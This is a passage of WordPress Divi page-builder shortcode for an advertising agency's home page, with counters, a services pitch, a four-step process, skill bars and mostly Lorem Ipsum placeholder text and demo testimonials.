number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Best-advertising-agency.png\" alt=\"Best Advertising Agency\" title_text=\"Best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" title_text=\"home-office-07-1\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" 